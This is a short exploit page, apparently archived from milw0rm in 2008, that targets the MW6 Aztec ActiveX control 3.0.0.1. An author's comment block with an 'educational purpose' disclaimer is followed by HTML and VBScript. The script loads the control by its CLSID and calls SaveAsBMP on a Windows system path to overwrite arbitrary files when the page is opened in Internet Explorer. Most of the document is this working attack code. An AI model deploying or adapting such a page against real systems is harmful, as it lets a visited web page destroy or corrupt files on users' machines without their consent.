47 lines
No EOL
1 KiB
HTML
47 lines
No EOL
1 KiB
HTML
<!--
|
|
By Dr.Pantagon
|
|
DeltaSecurityCenter
|
|
www.DeltaSecurity.ir
|
|
Description : Aztec ActiveX
|
|
ver : 3.0.0.1
|
|
CopyRight : MW6 Technologies, Inc.
|
|
Download Link : http://www.mw6tech.com/aztec/MW6Aztec.ZIP
|
|
|
|
This was written for educational purpose. Use it at your own risk.
|
|
Author will be not responsible for any damage.
|
|
|
|
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
|
|
|
|
This control contains two methods SaveAsBMP(); And SaveAsWMF();
|
|
|
|
Sub SaveAsWMF (
|
|
ByVal FileName As String
|
|
)
|
|
|
|
AND
|
|
|
|
Sub SaveAsWMF (
|
|
ByVal FileName As String
|
|
)
|
|
you can see this problem to all product this company
|
|
-->
|
|
<html>
|
|
Test Exploit page
|
|
<object classid='clsid:F359732D-D020-40ED-83FF-F381EFE36B54' id='target' ></object>
|
|
<script language='vbscript'>
|
|
|
|
targetFile = "C:\WINDOWS\system32\Aztec.dll"
|
|
prototype = "Sub SaveAsBMP ( ByVal FileName As String )"
|
|
memberName = "SaveAsBMP"
|
|
progid = "AZTECLib.MW6Aztec"
|
|
argCount = 1
|
|
|
|
arg1="c:\windows\system_.ini"
|
|
|
|
target.SaveAsBMP arg1
|
|
'target.SaveAsWMF arg1
|
|
|
|
|
|
</script>
|
|
|
|
# milw0rm.com [2008-10-29] |